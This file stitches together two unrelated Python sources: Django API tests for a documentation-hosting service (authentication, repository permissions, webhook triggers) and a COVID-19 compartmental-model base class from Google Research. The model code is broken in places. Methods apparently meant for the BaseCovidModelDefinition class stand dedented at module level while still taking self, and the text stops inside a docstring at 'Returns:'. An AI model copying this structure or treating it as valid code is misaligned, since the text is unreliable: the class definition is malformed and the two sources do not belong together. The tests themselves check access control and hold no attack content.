        user_admin = get(User, is_staff=True)
        project = get(Project, main_language_project=None, conf_py_file='foo')
        client = APIClient()

        client.force_authenticate(user=user_normal)
        resp = client.get('/api/v2/project/%s/' % (project.pk))
        self.assertEqual(resp.status_code, 200)
        self.assertNotIn('conf_py_file', resp.data)

        client.force_authenticate(user=user_admin)
        resp = client.get('/api/v2/project/%s/' % (project.pk))
        self.assertEqual(resp.status_code, 200)
        self.assertIn('conf_py_file', resp.data)
        self.assertEqual(resp.data['conf_py_file'], 'foo')

    def test_invalid_make_project(self):
        """
        Test that the authentication is turned on.
        """
        post_data = {"user": "/api/v1/user/2/",
                     "name": "awesome-project-2",
                     "repo": "https://github.com/ericholscher/django-bob.git"
                     }
        # wrong password -> request must be rejected
        resp = self.client.post(
            '/api/v1/project/', data=json.dumps(post_data),
            content_type='application/json',
            HTTP_AUTHORIZATION=u'Basic %s' % base64.b64encode(b'tester:notapass').decode('utf-8')
        )
        self.assertEqual(resp.status_code, 401)

    def test_make_project_dishonest_user(self):
        """
        Test that you can't create a project for another user
        """
        # represents dishonest data input, authentication happens for user 2
        post_data = {
            "users": ["/api/v1/user/1/"],
            "name": "awesome-project-2",
            "repo": "https://github.com/ericholscher/django-bob.git"
        }
        resp = self.client.post(
            '/api/v1/project/',
            data=json.dumps(post_data),
            content_type='application/json',
            HTTP_AUTHORIZATION=u'Basic %s' % base64.b64encode(b'tester:test').decode('utf-8')
        )
        self.assertEqual(resp.status_code, 401)

    def test_ensure_get_unauth(self):
        """
        Test that GET requests work without authenticating.
        """
        resp = self.client.get("/api/v1/project/", data={"format": "json"})
        self.assertEqual(resp.status_code, 200)

    def test_project_features(self):
        """Explicit and default-on features are both listed; default-off are not."""
        user = get(User, is_staff=True)
        project = get(Project, main_language_project=None)
        # One explicit, one implicit feature
        feature1 = get(Feature, projects=[project])
        feature2 = get(Feature, projects=[], default_true=True)
        feature3 = get(Feature, projects=[], default_true=False)
        client = APIClient()
        client.force_authenticate(user=user)
        resp = client.get('/api/v2/project/%s/' % (project.pk))
        self.assertEqual(resp.status_code, 200)
        self.assertIn('features', resp.data)
        self.assertEqual(
            resp.data['features'],
            [feature1.feature_id, feature2.feature_id]
        )

    def test_project_features_multiple_projects(self):
        """A feature shared by several projects appears once per project."""
        user = get(User, is_staff=True)
        project1 = get(Project, main_language_project=None)
        project2 = get(Project, main_language_project=None)
        feature = get(Feature, projects=[project1, project2], default_true=True)
        client = APIClient()
        client.force_authenticate(user=user)
        resp = client.get('/api/v2/project/%s/' % (project1.pk))
        self.assertEqual(resp.status_code, 200)
        self.assertIn('features', resp.data)
        self.assertEqual(
            resp.data['features'],
            [feature.feature_id]
        )
class APIImportTests(TestCase):
    """Import API endpoint tests"""

    fixtures = ['eric.json', 'test_data.json']

    def test_permissions(self):
        """Ensure user repositories aren't leaked to other users"""
        client = APIClient()

        # three users with one connected GitHub account each:
        # user_a owns an org + repo, user_b owns a bare repo, user_c owns nothing
        account_a = get(SocialAccount, provider='github')
        account_b = get(SocialAccount, provider='github')
        account_c = get(SocialAccount, provider='github')
        user_a = get(User, password='test', socialaccount_set=[account_a])
        user_b = get(User, password='test', socialaccount_set=[account_b])
        user_c = get(User, password='test', socialaccount_set=[account_c])
        org_a = get(RemoteOrganization, users=[user_a], account=account_a)
        repo_a = get(RemoteRepository, users=[user_a], organization=org_a,
                     account=account_a)
        repo_b = get(RemoteRepository, users=[user_b], organization=None,
                     account=account_b)

        # user_a sees only their own repo and org
        client.force_authenticate(user=user_a)
        resp = client.get(
            '/api/v2/remote/repo/',
            format='json')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        repos = resp.data['results']
        self.assertEqual(repos[0]['id'], repo_a.id)
        self.assertEqual(repos[0]['organization']['id'], org_a.id)
        self.assertEqual(len(repos), 1)

        resp = client.get(
            '/api/v2/remote/org/',
            format='json')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        orgs = resp.data['results']
        self.assertEqual(orgs[0]['id'], org_a.id)
        self.assertEqual(len(orgs), 1)

        # user_b sees only their org-less repo
        client.force_authenticate(user=user_b)
        resp = client.get(
            '/api/v2/remote/repo/',
            format='json')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        repos = resp.data['results']
        self.assertEqual(repos[0]['id'], repo_b.id)
        self.assertEqual(repos[0]['organization'], None)
        self.assertEqual(len(repos), 1)

        # user_c sees nothing
        client.force_authenticate(user=user_c)
        resp = client.get(
            '/api/v2/remote/repo/',
            format='json')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        repos = resp.data['results']
        self.assertEqual(len(repos), 0)
@mock.patch('readthedocs.core.views.hooks.trigger_build')
class IntegrationsTests(TestCase):

    """Integration tests for incoming webhooks (GitHub/GitLab/Bitbucket/generic)."""

    fixtures = ['eric.json', 'test_data.json']

    def setUp(self):
        self.project = get(Project)
        self.version = get(Version, verbose_name='master', project=self.project)

    def test_github_webhook(self, trigger_build):
        """GitHub webhook API"""
        client = APIClient()
        client.post(
            '/api/v2/webhook/github/{0}/'.format(self.project.slug),
            {'ref': 'master'},
            format='json',
        )
        trigger_build.assert_has_calls([
            mock.call(force=True, version=mock.ANY, project=self.project)
        ])
        client.post(
            '/api/v2/webhook/github/{0}/'.format(self.project.slug),
            {'ref': 'non-existent'},
            format='json',
        )
        # NOTE(review): this re-asserts the call recorded by the first POST;
        # a stricter check would verify that no *new* build was triggered for
        # the unknown ref.
        trigger_build.assert_has_calls([
            mock.call(force=True, version=mock.ANY, project=self.project)
        ])

    def test_github_invalid_webhook(self, trigger_build):
        """GitHub webhook unhandled event"""
        client = APIClient()
        resp = client.post(
            '/api/v2/webhook/github/{0}/'.format(self.project.slug),
            {'foo': 'bar'},
            format='json',
            HTTP_X_GITHUB_EVENT='pull_request',
        )
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(resp.data['detail'], 'Unhandled webhook event')

    def test_gitlab_webhook(self, trigger_build):
        """GitLab webhook API"""
        client = APIClient()
        client.post(
            '/api/v2/webhook/gitlab/{0}/'.format(self.project.slug),
            {'object_kind': 'push', 'ref': 'master'},
            format='json',
        )
        trigger_build.assert_has_calls([
            mock.call(force=True, version=mock.ANY, project=self.project)
        ])
        client.post(
            '/api/v2/webhook/gitlab/{0}/'.format(self.project.slug),
            {'object_kind': 'push', 'ref': 'non-existent'},
            format='json',
        )
        # NOTE(review): see test_github_webhook — this assertion is satisfied
        # by the first POST's recorded call.
        trigger_build.assert_has_calls([
            mock.call(force=True, version=mock.ANY, project=self.project)
        ])

    def test_gitlab_invalid_webhook(self, trigger_build):
        """GitLab webhook unhandled event"""
        client = APIClient()
        resp = client.post(
            '/api/v2/webhook/gitlab/{0}/'.format(self.project.slug),
            {'object_kind': 'pull_request'},
            format='json',
        )
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(resp.data['detail'], 'Unhandled webhook event')

    def test_bitbucket_webhook(self, trigger_build):
        """Bitbucket webhook API"""
        client = APIClient()
        client.post(
            '/api/v2/webhook/bitbucket/{0}/'.format(self.project.slug),
            {
                'push': {
                    'changes': [{
                        'new': {
                            'name': 'master'
                        }
                    }]
                }
            },
            format='json',
        )
        trigger_build.assert_has_calls([
            mock.call(force=True, version=mock.ANY, project=self.project)
        ])
        client.post(
            '/api/v2/webhook/bitbucket/{0}/'.format(self.project.slug),
            {
                'push': {
                    'changes': [{
                        'new': {
                            'name': 'non-existent'
                        }
                    }]
                }
            },
            format='json',
        )
        # NOTE(review): see test_github_webhook — this assertion is satisfied
        # by the first POST's recorded call.
        trigger_build.assert_has_calls([
            mock.call(force=True, version=mock.ANY, project=self.project)
        ])

    def test_bitbucket_invalid_webhook(self, trigger_build):
        """Bitbucket webhook unhandled event"""
        client = APIClient()
        resp = client.post(
            '/api/v2/webhook/bitbucket/{0}/'.format(self.project.slug),
            {'foo': 'bar'},
            format='json',
            HTTP_X_EVENT_KEY='pull_request'
        )
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(resp.data['detail'], 'Unhandled webhook event')

    def test_generic_api_fails_without_auth(self, trigger_build):
        """The generic webhook rejects unauthenticated requests."""
        client = APIClient()
        resp = client.post(
            '/api/v2/webhook/generic/{0}/'.format(self.project.slug),
            {},
            format='json',
        )
        self.assertEqual(resp.status_code, 403)
        self.assertEqual(
            resp.data['detail'],
            'Authentication credentials were not provided.'
        )

    def test_generic_api_respects_token_auth(self, trigger_build):
        """An integration token authenticates the generic webhook."""
        client = APIClient()
        integration = Integration.objects.create(
            project=self.project,
            integration_type=Integration.API_WEBHOOK
        )
        self.assertIsNotNone(integration.token)
        resp = client.post(
            '/api/v2/webhook/{0}/{1}/'.format(self.project.slug, integration.pk),
            {'token': integration.token},
            format='json',
        )
        self.assertEqual(resp.status_code, 200)
        self.assertTrue(resp.data['build_triggered'])
        # Test nonexistent branch
        resp = client.post(
            '/api/v2/webhook/{0}/{1}/'.format(self.project.slug, integration.pk),
            {'token': integration.token, 'branches': 'nonexistent'},
            format='json',
        )
        self.assertEqual(resp.status_code, 200)
        self.assertFalse(resp.data['build_triggered'])

    def test_generic_api_respects_basic_auth(self, trigger_build):
        """A project member's session authenticates the generic webhook."""
        client = APIClient()
        user = get(User)
        self.project.users.add(user)
        client.force_authenticate(user=user)
        resp = client.post(
            '/api/v2/webhook/generic/{0}/'.format(self.project.slug),
            {},
            format='json',
        )
        self.assertEqual(resp.status_code, 200)
        self.assertTrue(resp.data['build_triggered'])

    def test_generic_api_falls_back_to_token_auth(self, trigger_build):
        """A valid token works even when the session user lacks project access."""
        client = APIClient()
        user = get(User)
        client.force_authenticate(user=user)
        integration = Integration.objects.create(
            project=self.project,
            integration_type=Integration.API_WEBHOOK
        )
        self.assertIsNotNone(integration.token)
        resp = client.post(
            '/api/v2/webhook/{0}/{1}/'.format(self.project.slug, integration.pk),
            {'token': integration.token},
            format='json',
        )
        self.assertEqual(resp.status_code, 200)
        self.assertTrue(resp.data['build_triggered'])
| |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The base compartmental model definition.
This base class can be extended to fully define a customized compartmental
disease model that incorporates static and dynamic covariates by learning
adaptive encoders that modify the model's compartmental transitions.
"""
import abc
import collections
import functools
import logging
from typing import Any, Dict, List, Optional, Set, Tuple, Type, Union
import numpy as np
import pandas as pd
import tensorflow as tf
from covid_epidemiology.src import constants
from covid_epidemiology.src import feature_preprocessing as preprocessing
from covid_epidemiology.src.models import generic_seir_model_constructor
from covid_epidemiology.src.models.encoders import gam_encoder
from covid_epidemiology.src.models.encoders import variable_encoder_builder
from covid_epidemiology.src.models.encoders import variable_encoders
from covid_epidemiology.src.models.shared import model_spec as model_spec_lib
from covid_epidemiology.src.models.shared import typedefs
# pylint: disable=invalid-name
# Type alias covering the concrete encoder implementations used by this module.
_ENCODER_TYPES = Union[gam_encoder.GamEncoder, variable_encoders.StaticEncoder,
                       variable_encoders.PassThroughEncoder,
                       variable_encoders.VaccineEncoder]


# noinspection PyMethodMayBeStatic
class BaseModelDefinition(abc.ABC):
  """Defines the structure and dynamics of the compartmental model.

  Attributes:
    ts_preprocessing_config: The default configuration to use for
      pre-processing time-series features.
    static_preprocessing_config: The default configuration to use for
      pre-processing static features.
    random_seed: A number to be used as a random seed for the model.
  """

  # The name of the column in the static and ts dataframe that has the
  # location.
  _LOCATION_COLUMN_NAME: str = constants.GEO_ID_COLUMN

  # The list of rates that the encoders will predict.
  # This should be implemented by the sub-class; one encoder is created per
  # rate name (see initialize_encoders / initialize_seir_variables).
  _ENCODER_RATE_LIST: List[str] = []

  def __init__(
      self,
      ts_preprocessing_config: Optional[
          preprocessing.FeaturePreprocessingConfig] = None,
      static_preprocessing_config: Optional[
          preprocessing.FeaturePreprocessingConfig] = None,
      random_seed: int = 0,
      **kwargs,  # pylint:disable=unused-argument
  ):
    """Creates the compartmental model.

    Args:
      ts_preprocessing_config: The default configuration to use for
        pre-processing time-series features.
      static_preprocessing_config: The default configuration to use for
        pre-processing static features.
      random_seed: A random seed to use for the model.
      **kwargs: Model specific keyword arguments.
    """
    # Fall back to the default FeaturePreprocessingConfig when none is given.
    self.ts_preprocessing_config: preprocessing.FeaturePreprocessingConfig = (
        ts_preprocessing_config or preprocessing.FeaturePreprocessingConfig())
    self.static_preprocessing_config: preprocessing.FeaturePreprocessingConfig = (
        static_preprocessing_config or
        preprocessing.FeaturePreprocessingConfig())
    self.random_seed = random_seed

  @abc.abstractmethod
  def get_ts_features(self):
    """Gets mapping of feature aliases to feature names for time series.

    The feature aliases must match the associated "feature_name" in the
    input_ts_table_id BigQuery table.

    Returns:
      Mapping from feature names to the "feature_name" column value in the
      BigQuery table.
    """

  @abc.abstractmethod
  def transform_ts_features(
      self,
      ts_features,
      static_features,
      initial_train_window_size,
  ):
    """Transforms timeseries features (scales them, removes NaNs, etc).

    Can also create new features (e.g., ratios of existing features).

    Args:
      ts_features: A mapping from the feature name to its value, the value of
        each feature is a map from location to np.ndarray.
      static_features: A mapping from the static feature name to its value, the
        value of each feature is a map from location to float.
      initial_train_window_size: Size of initial training window.

    Returns:
      A mapping from the feature name to its value, the value of each feature
      is a map from location to np.ndarray.
    """

  @abc.abstractmethod
  def get_ts_features_to_preprocess(self):
    """Get the collection of time series features to pre-process.

    Returns:
      The feature aliases that should receive pre-processing.
    """

  @abc.abstractmethod
  def get_static_features(self):
    """Gets mapping of feature aliases to feature names for static features.

    The feature aliases must match the associated "feature_name" in the
    input_static_table_id BigQuery table.

    Returns:
      Mapping from feature names to the "feature_name" column value in the
      BigQuery table.
    """

  @abc.abstractmethod
  def get_model_spec(self, *args, **kwargs):
    """Returns the model spec.

    This defines the encoders and hyper-parameters for the model, keeping the
    feature configuration in one location.

    Args:
      *args: model spec related args.
      **kwargs: model spec related kwargs.

    Returns:
      The ModelSpec object for this model.
    """

  @abc.abstractmethod
  def seir_dynamics(self, current_state,
                    seir_variables):
    """Returns the derivatives of each state for SEIR dynamics.

    Args:
      current_state: The values of the model's compartments.
      seir_variables: The values of the model's transition variables.

    Returns:
      The derivative of the state so that the next state is the current state
      plus the output of this function.
    """

  @abc.abstractmethod
  def compute_losses(
      self, hparams, propagated_states,
      ground_truth_timeseries
  ):
    """Calculates the loss between the propagated states and the ground truth.

    Args:
      hparams: Dictionary of the model's hyperparameters.
      propagated_states: The model's current states.
      ground_truth_timeseries: The ground truth time series.

    Returns:
      The model's loss.
    """

  @abc.abstractmethod
  def transform_static_features(
      self, static_features
  ):
    """Transforms static features (scales them, removes NaNs, etc).

    Can also create new features (e.g., ratios).

    Args:
      static_features: A mapping from the feature name to its value, the value
        of each feature is a map from location to a value.

    Returns:
      A mapping from the feature name to its value and its fitted scaler after
      being prepared for the encoders, the value of each feature is a map from
      location to a float.
    """

  @abc.abstractmethod
  def bound_variables(
      self,
      seir_timeseries_variables,
  ):
    """Maps the encoded SEIR variables into realistic bounds for the model.

    This is called at the beginning of the propagation loop.

    Args:
      seir_timeseries_variables: The model's SEIR variables.

    Returns:
      The model's SEIR variables after they have been bounded appropriately.
    """

  @abc.abstractmethod
  def initialize_ground_truth_timeseries(
      self,
      static_features,
      ts_features,
      chosen_locations,
      num_observed_timesteps,
      infected_threshold,
  ):
    """Creates the ground truth data structure from the features.

    Args:
      static_features: The static features as a dictionary of dictionaries.
      ts_features: The time series data as a dictionary of dictionaries.
      chosen_locations: A list of the locations that will be processed.
      num_observed_timesteps: The total number of observed data points.
      infected_threshold: The minimum number of infections to consider the
        virus to be active.

    Returns:
      The ground truth data as a Tuple of:
        1. A tensor with populations for each of the locations.
        2. A dictionary where the keys are features and the values are tensors
           (n_locations x num_observed_timesteps) of the feature's values.
        3. A dictionary where the keys are features and the values are tensors
           (n_locations x num_observed_timesteps) that indicate whether the
           feature is valid.
        4. A list of all the ground truth feature names.
        5. A dictionary where the keys are ground truth compartment names and
           the values are the unmodified original ground truth values.
      A mask of if the infection is active which is determined when the number
      of confirmed cases at a given location is above the infected threshold.
      This float32 tensor is of size (num_locations x num_observed_timesteps).
    """

  def initialize_components(
      self,
      model_spec,
      ground_truth_timeseries,
      infected_threshold,
      hparams,
      num_locations,
      location_dependent_init,
      chosen_locations,
      num_observed_timesteps,
      forecast_window_size,
      output_window_size,
      static_features,
      static_overrides,
      ts_categorical_features,
      covariates,
      forecasted_covariates,
      covariate_overrides,
      static_scalers=None,
      ts_scalers=None,
      trainable: bool = True,
  ):
    """Initializes states, variables, and encoders.

    Args:
      model_spec: The model specification used for extracting the encoder
        specs.
      ground_truth_timeseries: A tuple of the populations of the chosen
        locations, the ground truth values for each compartment, the indicator
        for each ground truth value, and the names of the ground truth
        elements.
      infected_threshold: The minimum number of infections to consider the
        infection to be active in each location.
      hparams: Model hyper-parameters.
      num_locations: The number of locations that will be predicted for.
      location_dependent_init: If true different locations will have different
        bias terms.
      chosen_locations: A list of all the locations to use in the model.
      num_observed_timesteps: The total number of observed time steps.
      forecast_window_size: The number of training time steps to use in the
        encoder.
      output_window_size: The number of time steps to forecast from the trained
        encoder.
      static_features: A dictionary of static feature values where each value
        is a map of location to value for that location.
      static_overrides: A dictionary of over-rides for the static features.
      ts_categorical_features: Which features are categorical.
      covariates: A dictionary of covariate values where each value is a map of
        location to array of time values.
      forecasted_covariates: A map from covariate names to numpy arrays that
        have n_forecast_timesteps x n_locations.
      covariate_overrides: Overrides of the covariate values.
      static_scalers: fitted scalers for static features.
      ts_scalers: fitted scalers for timeseries features.
      trainable: If False the variables will not be trainable.

    Returns:
      init_state: The initial SEIR states as a Tensor.
      init_variables: The initial SEIR rates as taken from the
        hyper-parameters.
      seir_encoders: The initialized encoders.
    """
    init_state = self.initialize_seir_state(
        ground_truth_timeseries=ground_truth_timeseries,
        infected_threshold=infected_threshold,
        trainable=trainable,
    )
    init_variables = self.initialize_seir_variables(
        hparams=hparams,
        num_locations=num_locations,
        location_dependent_init=location_dependent_init,
        trainable=trainable,
    )
    seir_encoders = self.initialize_encoders(
        model_spec=model_spec,
        chosen_locations=chosen_locations,
        num_observed_timesteps=num_observed_timesteps,
        forecast_window_size=forecast_window_size,
        output_window_size=output_window_size,
        static_features=static_features,
        static_overrides=static_overrides,
        covariates=covariates,
        forecasted_covariates=forecasted_covariates,
        covariate_overrides=covariate_overrides,
        ts_categorical_features=ts_categorical_features,
        static_scalers=static_scalers,
        ts_scalers=ts_scalers,
        trainable=trainable,
    )
    return init_state, init_variables, seir_encoders

  @abc.abstractmethod
  def initialize_seir_state(
      self, ground_truth_timeseries,
      infected_threshold, trainable):
    """Returns initialized states for seir dynamics."""

  @abc.abstractmethod
  def sync_values(
      self,
      hparams,
      last_state,
      ground_truth_timeseries,
      timestep,
      is_training,
  ):
    """Syncs values with ground truth.

    This is used to implement partial teacher forcing and is used to update the
    last state prior to calling `seir_dynamics`.

    Args:
      hparams: Model's hyper-parameters. Usually contains sync_coef to define
        the amount of teacher forcing.
      last_state: The model's previous state.
      ground_truth_timeseries: The ground truth values to sync with.
      timestep: The current timestep.
      is_training: A boolean scalar Tensor. True if the model is being trained.

    Returns:
      The updated values for the last_state.
    """

  @abc.abstractmethod
  def sync_undoc(self, hparams, last_state,
                 ground_truth_timeseries,
                 last_variable, timestep,
                 is_training):
    """Synchronize the undocumented infected counts using confirmed increment.

    Args:
      hparams: Model's hyper-parameters. Usually contains sync_coef to define
        the amount of teacher forcing.
      last_state: The model's previous state.
      ground_truth_timeseries: The ground truth values to sync with.
      last_variable: The model's variables from the previous step. Should
        include the diagnosis rate.
      timestep: The current time step.
      is_training: A boolean scalar Tensor. True if the model is being trained.

    Returns:
      The updated values for the last_state.
    """

  @abc.abstractmethod
  def get_model_constructor(
      self,
      model_spec,
      random_seed,
  ):
    """Returns the model constructor for the model.

    Args:
      model_spec: A definition of the model spec. Returned by the
        get_model_spec function.
      random_seed: A seed used for initialization of pseudo-random numbers.

    Returns:
      The model constructor instance for the model.
    """

  def initialize_seir_variables(self, hparams, num_locations,
                                location_dependent_init,
                                trainable):
    """Returns initialized variables for SEIR terms."""
    np.random.seed(self.random_seed)
    # One degree of freedom per location only when the initialization is
    # location-dependent; otherwise a single shared value per rate.
    degrees_of_freedom = num_locations if location_dependent_init else 1
    init_rates = []
    for rate_name in self._ENCODER_RATE_LIST:
      # Each rate starts from its '<rate>_init' hyper-parameter value.
      init_rates.append(hparams[rate_name + '_init'] *
                        np.ones(degrees_of_freedom))
    variable_list = np.asarray(init_rates)
    seir_variables = tf.Variable(
        variable_list, dtype=tf.float32, trainable=trainable)
    return seir_variables

  def initialize_encoders(
      self,
      model_spec,
      chosen_locations,
      num_observed_timesteps,
      forecast_window_size,
      output_window_size,
      static_features,
      static_overrides,
      covariates,
      forecasted_covariates,
      covariate_overrides,
      ts_categorical_features,
      static_scalers=None,
      ts_scalers=None,
      trainable: bool = True,
  ):
    """Returns a set of initialized encoders for updating SEIR variables.

    Args:
      model_spec: The specification of the model and its encoders.
      chosen_locations: The locations to use data from.
      num_observed_timesteps: The number of total time steps to use.
      forecast_window_size: The number of time points to use in creating the
        forecast.
      output_window_size: The number of time points to forecast into the
        future.
      static_features: Static features that will be used for the encoder.
      static_overrides: Overrides of the static features.
      covariates: Time-varying covariates for the encoders.
      forecasted_covariates: Forecast of time points.
      covariate_overrides: Overrides for time-varying covariates.
      ts_categorical_features: Features that are categorical.
      static_scalers: fitted scalers for static features.
      ts_scalers: fitted scalers for timeseries features.
      trainable: If False the encoder variables will not be trainable.

    Returns:
      A tuple of all the initialized encoders.
    """
    encoders = list()
    # Build one encoder per rate, in _ENCODER_RATE_LIST order.
    for rate_name in self._ENCODER_RATE_LIST:
      encoders.append(
          variable_encoder_builder.encoder_from_encoder_spec(
              self.get_encoder_by_name(model_spec.encoder_specs, rate_name),
              chosen_locations=chosen_locations,
              num_known_timesteps=num_observed_timesteps,
              forecast_window_size=forecast_window_size,
              output_window_size=output_window_size,
              static_features=static_features,
              static_overrides=static_overrides,
              covariates=covariates,
              covariate_overrides=covariate_overrides,
              ts_categorical_features=ts_categorical_features,
              forecasted_covariates=forecasted_covariates,
              random_seed=self.random_seed,
              static_scalers=static_scalers,
              ts_scalers=ts_scalers,
              trainable=trainable,
          ))
    return tuple(encoders)

  def extract_all_features(
      self,
      static_data,
      ts_data,
      locations,
      training_window_size,
  ):
    """Creates time-series and static feature dictionaries from data frames.

    Args:
      static_data: Static data.
      ts_data: Time series data.
      locations: Locations to be extracted.
      training_window_size: Time-series data points to use for training.

    Returns:
      The static series dictionary mapping features to values where the values
      are a mapping of locations to a single numeric value.
      The time series dictionary mapping features to values where the values
      are a mapping of locations to time series values.
    """
    if static_data is None:
      static_features_and_scaler = (None, None)
    else:
      static_features_and_scaler = self._extract_static_features(
          static_data, locations)
    # Time-series extraction needs static features too (for feature
    # engineering), so it is skipped when either input is missing.
    if ts_data is None or static_data is None:
      ts_features_and_scaler = (None, None)
    else:
      (static_features, _) = static_features_and_scaler
      ts_features_and_scaler = self._extract_ts_features(
          ts_data, static_features, locations, training_window_size)
    return static_features_and_scaler, ts_features_and_scaler

  def _extract_ts_features(
      self, ts_data, static_features,
      locations, training_window_size
  ):
    """Creates time-series feature dictionaries from data frame.

    This is an internal function to allow for feature engineering using both
    static and time series features.

    Args:
      ts_data: Time series DataFrame with columns
        constants.FEATURE_NAME_COLUMN,
        `ModelDefinition._LOCATION_COLUMN_NAME`, constants.DATE_COLUMN, and
        constants.FEATURE_VALUE_COLUMN.
      static_features: Static features.
      locations: Locations to be extracted.
      training_window_size: Time-series data points to use for training.

    Returns:
      The time series dictionary mapping features to values where the values
      are a mapping of locations to time series values, and the fitted scalers.
    """
    all_dates = preprocessing.get_all_valid_dates(ts_data)
    ts_features = preprocessing.ts_feature_df_to_nested_dict(
        ts_data,
        locations,
        all_dates,
        self.get_ts_features(),
        self._LOCATION_COLUMN_NAME,
    )
    proc_features, feature_scalers = self.transform_ts_features(
        ts_features=ts_features,
        static_features=static_features,
        initial_train_window_size=training_window_size)
    return proc_features, feature_scalers

  def _extract_static_features(
      self, static_data, locations
  ):
    """Creates a static feature dictionary from a data frame.

    This is an internal function to allow for feature engineering using both
    static and time series features.

    Args:
      static_data: Static DataFrame with columns
        constants.FEATURE_NAME_COLUMN,
        `ModelDefinition._LOCATION_COLUMN_NAME`, and
        constants.FEATURE_VALUE_COLUMN.
      locations: List of locations to extract.

    Returns:
      The static dictionary mapping features to values where the values are
      a mapping of locations to static values, and the fitted scalers.
    """
    # Missing feature/location pairs default to None via the nested
    # defaultdict.
    static_features = collections.defaultdict(
        functools.partial(collections.defaultdict, lambda: None))
    static_feature_map = self.get_static_features()
    for feature_alias, feature_name in static_feature_map.items():
      feature_data = static_data[static_data[constants.FEATURE_NAME_COLUMN] ==
                                 feature_name]
      for location in locations:
        static_features[feature_alias][
            location] = preprocessing.static_covariate_value_or_none_for_location(
                feature_data, location, self._LOCATION_COLUMN_NAME)
    proc_features, feature_scalers = self.transform_static_features(
        static_features)
    return proc_features, feature_scalers

  def get_all_locations(self, input_df):
    """Gets a set of locations in the input data frame.

    Args:
      input_df: DataFrame with the column `_LOCATION_COLUMN_NAME`.

    Returns:
      The set of all locations.
    """
    return set(pd.unique(input_df[self._LOCATION_COLUMN_NAME]))

  def get_encoder_by_name(self, encoder_specs, name):
    """Returns the encoder spec whose `encoder_name` matches `name`.

    Args:
      encoder_specs: Iterable of encoder specs to search.
      name: The encoder name to look up.

    Returns:
      The first encoder spec with a matching name.

    Raises:
      ValueError: If no spec with the requested name exists.
    """
    for encoder_spec in encoder_specs:
      if encoder_spec.encoder_name == name:
        return encoder_spec
    raise ValueError(f'No encoder spec for requested encoder with name: {name}')

  def encode_variables(
      self,
      encoders,
      seir_timeseries_variables,
      global_biases,
      timestep,
      prediction,
      scaler,
      is_training,
  ):
    """Encodes the input variables to create an output time-series.

    Appends the encoded value for `timestep` to each variable's list in place.

    Args:
      encoders: The encoders used to encode the time-series of the SEIR
        variables.
      seir_timeseries_variables: The variables to be encoded.
      global_biases: The global biases for each of the encoders. Is only used
        for GAM encoders.
      timestep: The time point being encoded.
      prediction: A dictionary of predictions from the model.
      scaler: A dictionary to transform predictions the same way that the
        variables have already been transformed (e.g. scaling to 0-1).
      is_training: True if the model is training.
    """
    for variable_index in range(len(encoders)):
      variable_encoder = encoders[variable_index]
      variable_list = seir_timeseries_variables[variable_index]
      # GAM encoders take extra arguments (bias, prediction, scaler); other
      # encoder types only see the history and the timestep.
      if isinstance(variable_encoder, gam_encoder.GamEncoder):
        variable_bias = global_biases[variable_index]
        variable_list.append(
            variable_encoder.encode(variable_list, variable_bias, timestep,
                                    prediction, scaler, is_training))
      else:
        variable_list.append(
            variable_encoder.encode(variable_list, timestep, is_training))
class BaseCovidModelDefinition(BaseModelDefinition, abc.ABC):
  """Extends the base class with some common helper methods.

  This class takes advantage of additional assumptions about the model to
  consolidate the code for common tasks like feature pre-processing.
  """

  # The number of features that will be used for quantile estimation in the
  # method apply_quantile_transform.
  _NUM_QUANTILE_FEATURES: int = 7
def get_static_features_to_preprocess(self):
  """Returns the static feature aliases that should be pre-processed.

  Every declared static feature is pre-processed except population, which is
  used as-is.
  """
  excluded = {constants.POPULATION}
  return set(self.get_static_features()) - excluded
def transform_static_features(
    self, static_features
):
  """Prepares static features for the encoders.

  Validates that the mandatory population feature is present, then applies
  the standard static pre-processing to every feature.

  Args:
    static_features: A mapping from the feature name to its value, the value
      of each feature is a map from location to a value.

  Returns:
    A tuple of (transformed feature mapping, fitted scaler per feature).
  """
  # The static data must have population data for the compartments.
  if constants.POPULATION not in static_features:
    raise ValueError(f'Static features must include {constants.POPULATION}')
  transformed, scalers = {}, {}
  self._standard_static_preprocessing(static_features, transformed, scalers)
  return transformed, scalers
def _standard_static_preprocessing(
    self,
    raw_features,
    transformed_features,
    feature_scalers,
):
  """Pre-processes static features into the given output dictionaries.

  Features already present in `transformed_features` are left untouched.
  Features selected by `get_static_features_to_preprocess` are scaled/imputed;
  all others are copied through with a `None` scaler.

  Args:
    raw_features: A dictionary with the features to be processed.
    transformed_features: The output dictionary (mutated in place).
    feature_scalers: Output dict of fitted scalers (mutated in place).
  """
  selected = self.get_static_features_to_preprocess()
  for name, per_location in raw_features.items():
    if name in transformed_features:
      # Never overwrite data that an earlier step already produced.
      continue
    if name in selected:
      transformed_features[name], feature_scalers[name] = (
          self._preprocess_static_feature(per_location))
    else:
      transformed_features[name] = per_location
      feature_scalers[name] = None  # this feature was not scaled
def _preprocess_static_feature(
    self, feature_data
):
  """Imputes and (per config) standardizes a single static feature.

  Args:
    feature_data: A single static feature dictionary (location -> value).

  Returns:
    A tuple of (pre-processed feature data, fitted scaler).
  """
  cfg = self.static_preprocessing_config
  return preprocessing.preprocess_static_feature(
      feature_data, cfg.imputation_strategy, cfg.standardize)
def get_ts_features_to_preprocess(self):
  """Returns the time-series features needing extra pre-processing.

  The base implementation selects none; subclasses override as needed.
  """
  return set()
def transform_ts_features(
    self,
    ts_features,
    static_features,
    initial_train_window_size,
):
  """Transforms timeseries features (scales them, removes NaNs, etc).

  Delegates to the standard time-series pre-processing pipeline.

  Args:
    ts_features: A mapping from the feature name to its value, the value of
      each feature is a map from location to np.ndarray.
    static_features: A mapping from the static feature name to its value, the
      value of each feature is a map from location to float. Unused by the
      standard pipeline but kept for interface compatibility.
    initial_train_window_size: Size of initial training window.

  Returns:
